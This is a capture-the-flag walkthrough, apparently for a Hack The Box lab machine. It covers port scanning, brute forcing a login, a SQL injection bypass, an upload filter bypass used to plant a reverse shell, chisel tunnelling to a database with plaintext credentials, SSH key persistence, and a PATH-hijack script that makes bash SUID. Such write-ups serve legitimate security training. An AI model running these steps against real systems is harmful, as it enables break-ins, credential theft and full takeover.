-
The first step is to perform a scan of the open ports and then list the versions and technologies used on the open ports.
nmap -p- --open -vvv --min-rate 3000 -Pn -sS 10.10.10.185 -oG scan
/opt/extractports scan
nmap -p22,80 -sCV -Pn 10.10.10.185 -oN ports
- I access the website and find a section to log in. Inside it I try with typical credentials and I can’t access.
-
I search for file with php extension and I manage to find “upload.php”. This fuzzing I pass it through Caido and I get to see the content of the page as a response. Inside the page I see that there is the Admin user.
ffuf -c -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.10.185/FUZZ.php
-
I perform a brute force attack on the login panel to find the admin user password. I notice that if the password contains “sleep”, it does not show me the error message. This tells me that it may be a vulnerable panel.
hydra -l '' -P /usr/share/wordlists/rockyou.txt -f -v 10.10.10.185 http-post-form "/login.php:username=Admin&password=^PASS^:rong Username or P"
-
With this behavior in mind, I perform some basic MySQL injection attacks and manage to find one that allows me to login as admin without knowing your password.
- I find a panel that allows me to upload files. It limits me to have jpg, jpeg or png extension.
-
I try to change extensions, combine them and add magic numbers at the beginning and I manage to find a way to bypass and upload malicious files.I use Exploit-notes to test magic numbers.
-
I add as content a pentestmonkey reverse shell and I get an interactive console. For convenience I generate a new bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
-
Being www-data I search in the files of the web page and inside db.php5 I find the credentials to connect to MySQL.
-
The system does not have mysql installer, I share port 3306 to my machine to be able to consult the content of the DDBB.
./chisel server --reverse -p 1235
./chisel client 10.10.14.21:1235 R:3306:127.0.0.1:3306 &
mysql -u theseus -piamkingtheseus -D Magic -h 127.0.0.1
-
Inside the DDBB I find the credential to connect to the login panel at the beginning, I verify the reuse of the password with the only user of the system and I manage to become theseus.
-
I generate an ssh key to be able to connect more easily. As I am the user theseus I can read the first flag found in my working directory.
ssh-keygen -f key
cat key.pub >> /home/theseus/.ssh/authorized_keys
ssh -i key theseus@10.10.10.185
-
I look for how the user theseus the binaries with SUID permissions and I find one that is not common, /bin/sysinfo
find / -perm -4000 2>/dev/null
-
Running this binary displays a lot of information. When consulting it in detail I find a part that shows an error message. I decide to consult the calls that it makes behind and I observe that several calls are made to binaries with relative paths.
-
I focus on fdisk, I create a file with execute permissions in a directory that has permissions. As content I put it to change the binary /bin/bash to SUID. I export the path so that it starts looking for the directory that contains my exploit and when executing the sysinfo binary again I manage to change that my exploit is executed and that it changes the permissions. Thanks to this I can become root and I can read the second flag.
#!/bin/bash
chmod u+s /bin/bash
export PATH="/tmp:$PATH"
/bin/sysinfo
bash -p